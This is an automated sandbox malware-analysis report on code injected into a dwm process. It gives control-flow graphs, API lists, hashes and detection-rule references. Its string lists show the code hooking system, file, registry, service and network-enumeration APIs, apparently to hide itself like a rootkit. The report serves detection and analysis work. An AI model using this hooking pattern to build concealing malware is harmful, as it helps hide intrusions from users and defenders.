                                                        control_flow_graph 131 2baaedf50d0-2baaedf50fc 132 2baaedf50fe-2baaedf5106 131->132 133 2baaedf510d-2baaedf5116 131->133 132->133 134 2baaedf5118-2baaedf5120 133->134 135 2baaedf5127-2baaedf5130 133->135 134->135 136 2baaedf5132-2baaedf513a 135->136 137 2baaedf5141-2baaedf514a 135->137 136->137 138 2baaedf5156-2baaedf5161 GetCurrentThreadId 137->138 139 2baaedf514c-2baaedf5151 137->139 141 2baaedf5163-2baaedf5168 138->141 142 2baaedf516d-2baaedf5174 138->142 140 2baaedf56d3-2baaedf56da 139->140 141->140 143 2baaedf5176-2baaedf517c 142->143 144 2baaedf5181-2baaedf518a 142->144 143->140 145 2baaedf5196-2baaedf51a2 144->145 146 2baaedf518c-2baaedf5191 144->146 147 2baaedf51a4-2baaedf51c9 145->147 148 2baaedf51ce-2baaedf5225 call 2baaedf56e0 * 2 145->148 146->140 147->140 153 2baaedf5227-2baaedf522e 148->153 154 2baaedf523a-2baaedf5243 148->154 157 2baaedf5236 153->157 158 2baaedf5230 153->158 155 2baaedf5255-2baaedf525e 154->155 156 2baaedf5245-2baaedf5252 154->156 159 2baaedf5273-2baaedf5298 call 2baaedf7870 155->159 160 2baaedf5260-2baaedf5270 155->160 156->155 157->154 162 2baaedf52a6-2baaedf52aa 157->162 161 2baaedf52b0-2baaedf52b6 158->161 171 2baaedf529e 159->171 172 2baaedf532d-2baaedf5342 call 2baaedf3cc0 159->172 160->159 163 2baaedf52b8-2baaedf52d4 call 2baaedf4390 161->163 164 2baaedf52e5-2baaedf52eb 161->164 162->161 163->164 174 2baaedf52d6-2baaedf52de 163->174 168 2baaedf5315-2baaedf5328 164->168 169 2baaedf52ed-2baaedf530c call 2baaedf78ac 164->169 168->140 169->168 171->162 178 2baaedf5344-2baaedf534c 172->178 179 2baaedf5351-2baaedf535a 172->179 174->164 178->162 180 2baaedf536c-2baaedf53ba call 2baaedf8c60 179->180 181 2baaedf535c-2baaedf5369 179->181 184 2baaedf53c2-2baaedf53ca 180->184 181->180 185 2baaedf54d7-2baaedf54df 184->185 186 2baaedf53d0-2baaedf54bb call 2baaedf7440 184->186 187 2baaedf5523-2baaedf552b 185->187 188 2baaedf54e1-2baaedf54f4 call 2baaedf4590 185->188 198 2baaedf54bf-2baaedf54ce call 2baaedf4060 186->198 199 2baaedf54bd 186->199 191 2baaedf5537-2baaedf5546 187->191 192 2baaedf552d-2baaedf5535 187->192 200 2baaedf54f8-2baaedf5521 188->200 201 2baaedf54f6 188->201 196 2baaedf5548 191->196 197 2baaedf554f 191->197 192->191 195 2baaedf5554-2baaedf5561 192->195 203 2baaedf5564-2baaedf55b9 call 2baaedf85c0 195->203 204 2baaedf5563 195->204 196->197 197->195 208 2baaedf54d2 198->208 209 2baaedf54d0 198->209 199->185 200->185 201->187 210 2baaedf55c8-2baaedf5661 call 2baaedf4510 call 2baaedf4470 VirtualProtect 203->210 211 2baaedf55bb-2baaedf55c3 203->211 204->203 208->184 209->185 216 2baaedf5663-2baaedf5668 GetLastError 210->216 217 2baaedf5671-2baaedf56d1 210->217 216->217 217->140
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                        • Instruction ID: 29d0c8c4cc931ee5d2ea1b84e55410bc3ffa75d85f6dc27cb7d6306d52025f18
                                                        • Opcode Fuzzy Hash: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                        • Instruction Fuzzy Hash: 5D02D932219B8486EB60DB59F59435ABBB1F3C4794F204515EACE87BA8DF7CC884CB11
                                                        Function 000002BAAEDF39E0 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Virtual$AllocQuery
                                                        • String ID:
                                                        • API String ID: 31662377-0
                                                        • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                        • Instruction ID: f8a67aedf62b22c6bdb465cfe66f1f0cb3fdfa8cf39a8d96e9152993a44561f3
                                                        • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                        • Instruction Fuzzy Hash: CC31F122219B8481EA74DB26E05935E77B4F7887C4F210525F5CE46BA8DF7DC680CB26
                                                        Function 000002BAAEDF328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction ID: a60ade9394fe4c35ab755e97a5dfbc478c905fbaa392ae86923eb6e0e9d87758
                                                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction Fuzzy Hash: 4D116D30A10741A2FB78EB21F80D35933F4AB58B45F714128D9CE85995EF7CC184C232
                                                        Function 000002BAAEDF4DF0 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                        • String ID:
                                                        • API String ID: 3733156554-0
                                                        • Opcode ID: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                        • Instruction ID: 88b62564cefa99c5df0553c881ea4e992a6981c752067f8587c1bb73a495c4a1
                                                        • Opcode Fuzzy Hash: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                        • Instruction Fuzzy Hash: 96F0B736228B4484D730DB05E45979ABBB0E388BD4F644116BACD47BA9CB3DC690CB61
                                                        Function 000002BAAEDC273C Relevance: 3.2, APIs: 2, Instructions: 187memorylibraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 265 2baaedc273c-2baaedc27a4 call 2baaedc29d4 * 4 274 2baaedc29b2 265->274 275 2baaedc27aa-2baaedc27ad 265->275 277 2baaedc29b4-2baaedc29d0 274->277 275->274 276 2baaedc27b3-2baaedc27b6 275->276 276->274 278 2baaedc27bc-2baaedc27bf 276->278 278->274 279 2baaedc27c5-2baaedc27e6 VirtualAlloc 278->279 279->274 280 2baaedc27ec-2baaedc280c 279->280 281 2baaedc2838-2baaedc283f 280->281 282 2baaedc280e-2baaedc2836 280->282 283 2baaedc2845-2baaedc2852 281->283 284 2baaedc28df-2baaedc28e6 281->284 282->281 282->282 283->284 287 2baaedc2858-2baaedc286a LoadLibraryA 283->287 285 2baaedc2992-2baaedc29b0 284->285 286 2baaedc28ec-2baaedc2901 284->286 285->277 286->285 290 2baaedc2907 286->290 288 2baaedc28ca-2baaedc28d2 287->288 289 2baaedc286c-2baaedc2878 287->289 288->287 292 2baaedc28d4-2baaedc28d9 288->292 291 2baaedc28c5-2baaedc28c8 289->291 294 2baaedc290d-2baaedc2921 290->294 291->288 295 2baaedc287a-2baaedc287d 291->295 292->284 296 2baaedc2982-2baaedc298c 294->296 297 2baaedc2923-2baaedc2934 294->297 298 2baaedc28a7-2baaedc28b7 295->298 299 2baaedc287f-2baaedc28a5 295->299 296->285 296->294 301 2baaedc2936-2baaedc293d 297->301 302 2baaedc293f-2baaedc2943 297->302 306 2baaedc28ba-2baaedc28c1 298->306 299->306 303 2baaedc2970-2baaedc2980 301->303 304 2baaedc2945-2baaedc294b 302->304 305 2baaedc294d-2baaedc2951 302->305 303->296 303->297 304->303 307 2baaedc2963-2baaedc2967 305->307 308 2baaedc2953-2baaedc2961 305->308 306->291 307->303 310 2baaedc2969-2baaedc296c 307->310 308->303 310->303
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183027949.000002BAAEDC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEDC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedc0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: AllocLibraryLoadVirtual
                                                        • String ID:
                                                        • API String ID: 3550616410-0
                                                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction ID: 8272c5051e45bb1e08acf4cb034566de5e43c5be223a5e3606f7b74c943da425
                                                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction Fuzzy Hash: 41610532B01A9087DB66CF29940472D73B2FB94BE4F688521DE9D07788DF38D852C722
                                                        Function 000002BAAEDF1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 000002BAAEDF1628: GetProcessHeap.KERNEL32 ref: 000002BAAEDF1633
                                                          • Part of subcall function 000002BAAEDF1628: HeapAlloc.KERNEL32 ref: 000002BAAEDF1642
                                                          • Part of subcall function 000002BAAEDF1628: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDF16B2
                                                          • Part of subcall function 000002BAAEDF1628: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDF16DF
                                                          • Part of subcall function 000002BAAEDF1628: RegCloseKey.ADVAPI32 ref: 000002BAAEDF16F9
                                                          • Part of subcall function 000002BAAEDF1628: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDF1719
                                                          • Part of subcall function 000002BAAEDF1628: RegCloseKey.ADVAPI32 ref: 000002BAAEDF1734
                                                          • Part of subcall function 000002BAAEDF1628: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDF1754
                                                          • Part of subcall function 000002BAAEDF1628: RegCloseKey.ADVAPI32 ref: 000002BAAEDF176F
                                                          • Part of subcall function 000002BAAEDF1628: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDF178F
                                                          • Part of subcall function 000002BAAEDF1628: RegCloseKey.ADVAPI32 ref: 000002BAAEDF17AA
                                                          • Part of subcall function 000002BAAEDF1628: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDF17CA
                                                        • Sleep.KERNEL32 ref: 000002BAAEDF1AD7
                                                        • SleepEx.KERNELBASE ref: 000002BAAEDF1ADD
                                                          • Part of subcall function 000002BAAEDF1628: RegCloseKey.ADVAPI32 ref: 000002BAAEDF17E5
                                                          • Part of subcall function 000002BAAEDF1628: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDF1805
                                                          • Part of subcall function 000002BAAEDF1628: RegCloseKey.ADVAPI32 ref: 000002BAAEDF1820
                                                          • Part of subcall function 000002BAAEDF1628: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDF1840
                                                          • Part of subcall function 000002BAAEDF1628: RegCloseKey.ADVAPI32 ref: 000002BAAEDF185B
                                                          • Part of subcall function 000002BAAEDF1628: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDF187B
                                                          • Part of subcall function 000002BAAEDF1628: RegCloseKey.ADVAPI32 ref: 000002BAAEDF1896
                                                          • Part of subcall function 000002BAAEDF1628: RegCloseKey.ADVAPI32 ref: 000002BAAEDF18A0
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$HeapSleep$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1534210851-0
                                                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction ID: 030c3e66d5f789bef5497c226e0068f4c419c483030d182e68aceade9474b657
                                                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction Fuzzy Hash: 7731ED61200B41D2FF50DB27DA493A933B4AB99BC4F6454299E8D8B7D7FF24C851C232

                                                        Non-executed Functions

                                                        Function 000002BAAEDF2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 573 2baaedf2b2c-2baaedf2ba5 call 2baaee12ce0 576 2baaedf2ee0-2baaedf2f03 573->576 577 2baaedf2bab-2baaedf2bb1 573->577 577->576 578 2baaedf2bb7-2baaedf2bba 577->578 578->576 579 2baaedf2bc0-2baaedf2bc3 578->579 579->576 580 2baaedf2bc9-2baaedf2bd9 GetModuleHandleA 579->580 581 2baaedf2bed 580->581 582 2baaedf2bdb-2baaedf2beb call 2baaee06090 580->582 583 2baaedf2bf0-2baaedf2c0e 581->583 582->583 583->576 587 2baaedf2c14-2baaedf2c33 StrCmpNIW 583->587 587->576 588 2baaedf2c39-2baaedf2c3d 587->588 588->576 589 2baaedf2c43-2baaedf2c4d 588->589 589->576 590 2baaedf2c53-2baaedf2c5a 589->590 590->576 591 2baaedf2c60-2baaedf2c73 590->591 592 2baaedf2c75-2baaedf2c81 591->592 593 2baaedf2c83 591->593 594 2baaedf2c86-2baaedf2c8a 592->594 593->594 595 2baaedf2c8c-2baaedf2c98 594->595 596 2baaedf2c9a 594->596 597 2baaedf2c9d-2baaedf2ca7 595->597 596->597 598 2baaedf2d9d-2baaedf2da1 597->598 599 2baaedf2cad-2baaedf2cb0 597->599 600 2baaedf2da7-2baaedf2daa 598->600 601 2baaedf2ed2-2baaedf2eda 598->601 602 2baaedf2cc2-2baaedf2ccc 599->602 603 2baaedf2cb2-2baaedf2cbf call 2baaedf199c 599->603 607 2baaedf2dac-2baaedf2db8 call 2baaedf199c 600->607 608 2baaedf2dbb-2baaedf2dc5 600->608 601->576 601->591 605 2baaedf2d00-2baaedf2d0a 602->605 606 2baaedf2cce-2baaedf2cdb 602->606 603->602 611 2baaedf2d0c-2baaedf2d19 605->611 612 2baaedf2d3a-2baaedf2d3d 605->612 606->605 610 2baaedf2cdd-2baaedf2cea 606->610 607->608 614 2baaedf2dc7-2baaedf2dd4 608->614 615 2baaedf2df5-2baaedf2df8 608->615 619 2baaedf2ced-2baaedf2cf3 610->619 611->612 620 2baaedf2d1b-2baaedf2d28 611->620 621 2baaedf2d3f-2baaedf2d49 call 2baaedf1bbc 612->621 622 2baaedf2d4b-2baaedf2d58 lstrlenW 612->622 614->615 616 2baaedf2dd6-2baaedf2de3 614->616 617 2baaedf2e05-2baaedf2e12 lstrlenW 615->617 618 2baaedf2dfa-2baaedf2e03 call 2baaedf1bbc 615->618 624 2baaedf2de6-2baaedf2dec 616->624 630 2baaedf2e35-2baaedf2e3f call 2baaedf3844 617->630 631 2baaedf2e14-2baaedf2e1e 617->631 618->617 635 2baaedf2e4a-2baaedf2e55 618->635 628 2baaedf2cf9-2baaedf2cfe 619->628 629 2baaedf2d93-2baaedf2d98 619->629 632 2baaedf2d2b-2baaedf2d31 620->632 621->622 621->629 625 2baaedf2d7b-2baaedf2d8d call 2baaedf3844 622->625 626 2baaedf2d5a-2baaedf2d64 622->626 634 2baaedf2dee-2baaedf2df3 624->634 624->635 625->629 639 2baaedf2e42-2baaedf2e44 625->639 626->625 636 2baaedf2d66-2baaedf2d79 call 2baaedf152c 626->636 628->605 628->619 629->639 630->639 631->630 640 2baaedf2e20-2baaedf2e33 call 2baaedf152c 631->640 632->629 641 2baaedf2d33-2baaedf2d38 632->641 634->615 634->624 644 2baaedf2e57-2baaedf2e5b 635->644 645 2baaedf2ecc-2baaedf2ed0 635->645 636->625 636->629 639->601 639->635 640->630 640->635 641->612 641->632 650 2baaedf2e63-2baaedf2e7d call 2baaedf85c0 644->650 651 2baaedf2e5d-2baaedf2e61 644->651 645->601 654 2baaedf2e80-2baaedf2e83 650->654 651->650 651->654 657 2baaedf2ea6-2baaedf2ea9 654->657 658 2baaedf2e85-2baaedf2ea3 call 2baaedf85c0 654->658 657->645 660 2baaedf2eab-2baaedf2ec9 call 2baaedf85c0 657->660 658->657 660->645
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 2119608203-3850299575
                                                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction ID: 16ed6b47ea5e35ff7bce0c17d3cc6a2b3e314c65d60c4d9d2a118343faa5b8d7
                                                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction Fuzzy Hash: C1B1C172210B9082EB68CF29D8587A973B4F744B94F745116EE8D57B98EF39CD80C3A1
                                                        Function 000002BAAEDF7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction ID: 991226839482be981db0a0c9d0a5b3f0b4c3dfa8c3e3b25629e8c410bb44d143
                                                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction Fuzzy Hash: 93316D72215B819AEBA0DF60E8947ED7370F784744F54402ADB8E57B98EF38C648C721
                                                        Function 000002BAAEDFD2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction ID: 7d54bd0195f5e20e888b4046c37b92221e6e6a0e16ed04466e2058f5df45964c
                                                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction Fuzzy Hash: FA317C36214B809AEB60CF25E8843AE73B0F789758F640126EADD43B98DF38C155CB51
                                                        Function 000002BAAEDF12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction ID: 7c84d59281942a78493a40752f210f11be734ac56bd795eca8a9807e03bbe614
                                                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction Fuzzy Hash: 50515D36200B859AEB64CF62E54835AB7B1F789F99F248124DE8907B59DF3CC049CB11
                                                        Function 000002BAAEDF1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                        • API String ID: 4175298099-1975688563
                                                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction ID: c0e7faaba75385aaa4adb1cfac454377c355040c6669c12fb79adebc4bd92ff3
                                                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction Fuzzy Hash: 4D31D564240A4AB2EA60EF69EC597D43330BB14344FF00413E8CD52976EF3C8689C772
                                                        Function 000002BAAEDC6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 415 2baaedc6910-2baaedc6916 416 2baaedc6918-2baaedc691b 415->416 417 2baaedc6951-2baaedc695b 415->417 419 2baaedc6945-2baaedc6984 call 2baaedc6fc0 416->419 420 2baaedc691d-2baaedc6920 416->420 418 2baaedc6a78-2baaedc6a8d 417->418 424 2baaedc6a8f 418->424 425 2baaedc6a9c-2baaedc6ab6 call 2baaedc6e54 418->425 435 2baaedc6a52 419->435 436 2baaedc698a-2baaedc699f call 2baaedc6e54 419->436 422 2baaedc6938 __scrt_dllmain_crt_thread_attach 420->422 423 2baaedc6922-2baaedc6925 420->423 431 2baaedc693d-2baaedc6944 422->431 427 2baaedc6927-2baaedc6930 423->427 428 2baaedc6931-2baaedc6936 call 2baaedc6f04 423->428 429 2baaedc6a91-2baaedc6a9b 424->429 438 2baaedc6ab8-2baaedc6aed call 2baaedc6f7c call 2baaedc6e1c call 2baaedc7318 call 2baaedc7130 call 2baaedc7154 call 2baaedc6fac 425->438 439 2baaedc6aef-2baaedc6b20 call 2baaedc7190 425->439 428->431 441 2baaedc6a54-2baaedc6a69 435->441 448 2baaedc69a5-2baaedc69b6 call 2baaedc6ec4 436->448 449 2baaedc6a6a-2baaedc6a77 call 2baaedc7190 436->449 438->429 450 2baaedc6b22-2baaedc6b28 439->450 451 2baaedc6b31-2baaedc6b37 439->451 468 2baaedc6a07-2baaedc6a11 call 2baaedc7130 448->468 469 2baaedc69b8-2baaedc69dc call 2baaedc72dc call 2baaedc6e0c call 2baaedc6e38 call 2baaedcac0c 448->469 449->418 450->451 452 2baaedc6b2a-2baaedc6b2c 450->452 453 2baaedc6b39-2baaedc6b43 451->453 454 2baaedc6b7e-2baaedc6b94 call 2baaedc268c 451->454 458 2baaedc6c1f-2baaedc6c2c 452->458 459 2baaedc6b45-2baaedc6b4d 453->459 460 2baaedc6b4f-2baaedc6b5d call 2baaedd5780 453->460 476 2baaedc6b96-2baaedc6b98 454->476 477 2baaedc6bcc-2baaedc6bce 454->477 465 2baaedc6b63-2baaedc6b78 call 2baaedc6910 459->465 460->465 480 2baaedc6c15-2baaedc6c1d 460->480 465->454 465->480 468->435 489 2baaedc6a13-2baaedc6a1f call 2baaedc7180 468->489 469->468 518 2baaedc69de-2baaedc69e5 __scrt_dllmain_after_initialize_c 469->518 476->477 485 2baaedc6b9a-2baaedc6bbc call 2baaedc268c call 2baaedc6a78 476->485 478 2baaedc6bd5-2baaedc6bea call 2baaedc6910 477->478 479 2baaedc6bd0-2baaedc6bd3 477->479 478->480 499 2baaedc6bec-2baaedc6bf6 478->499 479->478 479->480 480->458 485->477 510 2baaedc6bbe-2baaedc6bc6 call 2baaedd5780 485->510 507 2baaedc6a45-2baaedc6a50 489->507 508 2baaedc6a21-2baaedc6a2b call 2baaedc7098 489->508 504 2baaedc6bf8-2baaedc6bff 499->504 505 2baaedc6c01-2baaedc6c11 call 2baaedd5780 499->505 504->480 505->480 507->441 508->507 517 2baaedc6a2d-2baaedc6a3b 508->517 510->477 517->507 518->468 519 2baaedc69e7-2baaedc6a04 call 2baaedcabc8 518->519 519->468
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183027949.000002BAAEDC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEDC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedc0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                        • API String ID: 190073905-1786718095
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: e81c386bd8547cca1137d390a578599d5395f434cc6727d434b89f4cfb340a6e
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: 4F81F0216006018AFA56AB75948D39937B1EBC5FC0F3494269AED83396DF39C846C733
                                                        Function 000002BAAEDFCE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetLastError.KERNEL32 ref: 000002BAAEDFCE37
                                                        • FlsGetValue.KERNEL32(?,?,?,000002BAAEE00A6B,?,?,?,000002BAAEE0045C,?,?,?,000002BAAEDFC84F), ref: 000002BAAEDFCE4C
                                                        • FlsSetValue.KERNEL32(?,?,?,000002BAAEE00A6B,?,?,?,000002BAAEE0045C,?,?,?,000002BAAEDFC84F), ref: 000002BAAEDFCE6D
                                                        • FlsSetValue.KERNEL32(?,?,?,000002BAAEE00A6B,?,?,?,000002BAAEE0045C,?,?,?,000002BAAEDFC84F), ref: 000002BAAEDFCE9A
                                                        • FlsSetValue.KERNEL32(?,?,?,000002BAAEE00A6B,?,?,?,000002BAAEE0045C,?,?,?,000002BAAEDFC84F), ref: 000002BAAEDFCEAB
                                                        • FlsSetValue.KERNEL32(?,?,?,000002BAAEE00A6B,?,?,?,000002BAAEE0045C,?,?,?,000002BAAEDFC84F), ref: 000002BAAEDFCEBC
                                                        • SetLastError.KERNEL32 ref: 000002BAAEDFCED7
                                                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002BAAEE00A6B,?,?,?,000002BAAEE0045C,?,?,?,000002BAAEDFC84F), ref: 000002BAAEDFCF0D
                                                        • FlsSetValue.KERNEL32(?,?,00000001,000002BAAEDFECCC,?,?,?,?,000002BAAEDFBF9F,?,?,?,?,?,000002BAAEDF7AB0), ref: 000002BAAEDFCF2C
                                                          • Part of subcall function 000002BAAEDFD6CC: HeapAlloc.KERNEL32 ref: 000002BAAEDFD721
